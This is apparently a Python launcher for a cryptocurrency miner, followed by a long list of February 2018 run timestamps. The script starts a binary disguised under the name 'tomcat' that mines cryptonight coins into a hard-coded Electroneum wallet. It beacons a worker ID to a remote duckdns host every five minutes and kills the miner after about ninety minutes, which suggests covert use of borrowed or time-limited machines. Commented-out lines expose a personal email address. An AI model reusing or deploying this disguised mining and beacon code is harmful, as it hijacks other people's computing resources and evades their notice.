import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:05.284829
#2018-02-17 16:09:05.020486
#2018-02-17 17:56:03.647216
#2018-02-17 19:43:06.608696
#2018-02-17 21:30:07.101096
#2018-02-17 23:14:02.279223
#2018-02-18 01:01:05.642600
#2018-02-18 02:48:03.814906
#2018-02-18 04:37:05.952050
#2018-02-18 06:29:06.140343
#2018-02-18 08:17:05.997373
#2018-02-18 10:05:06.654795
#2018-02-18 11:51:07.095870
#2018-02-18 13:36:08.553810
#2018-02-18 15:26:06.491094
#2018-02-18 17:15:05.692697
#2018-02-18 19:03:01.807206
#2018-02-18 20:50:01.467507
#2018-02-18 22:35:03.914074
#2018-02-19 00:23:05.989760
#2018-02-19 02:09:05.470342
#2018-02-19 03:57:07.391883
#2018-02-19 05:43:01.272847
#2018-02-19 07:31:03.940478
#2018-02-19 09:21:05.015788
#2018-02-19 11:10:08.141506
#2018-02-19 12:56:06.066148
#2018-02-19 14:44:04.809494
#2018-02-19 16:34:02.175017
#2018-02-19 18:19:09.141846
#2018-02-19 20:05:09.263919
#2018-02-19 21:57:07.382525
#2018-02-19 23:42:04.307883
#2018-02-20 01:29:05.679640
#2018-02-20 03:18:06.615139
#2018-02-20 05:05:04.715665
#2018-02-20 06:48:03.780618
#2018-02-20 08:34:04.480074
#2018-02-20 10:18:02.305007
#2018-02-20 12:03:04.670617
#2018-02-20 13:49:10.142662
#2018-02-20 15:34:07.027510
#2018-02-20 17:19:06.293605
#2018-02-20 19:09:10.198740
#2018-02-20 20:58:05.429291
#2018-02-20 22:43:01.371047
#2018-02-21 00:25:08.599680
#2018-02-21 02:13:02.020474
#2018-02-21 03:59:04.781891
#2018-02-21 05:46:03.788434
#2018-02-21 07:34:13.734731
#2018-02-21 09:18:08.712486
#2018-02-21 11:07:05.019170
#2018-02-21 12:53:07.570153
#2018-02-21 14:43:01.860666
#2018-02-21 16:31:06.919729
#2018-02-21 18:22:08.242482
#2018-02-21 20:07:08.795350
#2018-02-21 21:55:08.717808
#2018-02-21 23:43:04.629986
#2018-02-22 01:33:07.161871
#2018-02-22 03:21:04.521029
#2018-02-22 05:07:01.764011
#2018-02-22 06:49:06.284107
#2018-02-22 08:37:06.550398
#2018-02-22 10:26:08.910721
#2018-02-22 12:13:05.899825
#2018-02-22 13:59:01.761827
#2018-02-22 15:48:01.751806
#2018-02-22 17:35:03.860064
#2018-02-22 19:21:04.471672
#2018-02-22 21:12:07.100730
#2018-02-22 23:17:04.747580
#2018-02-23 01:06:01.546989
#2018-02-23 02:53:08.788649
#2018-02-23 04:40:04.768149
#2018-02-23 06:27:04.944825
#2018-02-23 08:16:05.777837
#2018-02-23 10:32:09.259649
#2018-02-23 12:23:08.759184
#2018-02-23 14:12:01.857178
#2018-02-23 16:03:04.392720
#2018-02-23 17:48:07.553864
#2018-02-23 19:35:09.257394
#2018-02-23 21:20:01.411534
#2018-02-23 23:09:07.724958
#2018-02-24 00:57:01.679111
#2018-02-24 02:52:07.739842
#2018-02-24 04:41:07.575804
#2018-02-24 06:25:06.767470
#2018-02-24 08:13:01.547733
#2018-02-24 09:57:06.767424
#2018-02-24 11:56:02.036181
#2018-02-24 13:44:07.336511
#2018-02-24 15:33:07.119989
#2018-02-24 17:28:06.055083
#2018-02-24 19:15:08.966919
#2018-02-24 21:03:03.689274
#2018-02-25 01:10:01.456943
#2018-02-25 04:52:05.147302
#2018-02-25 08:13:07.355807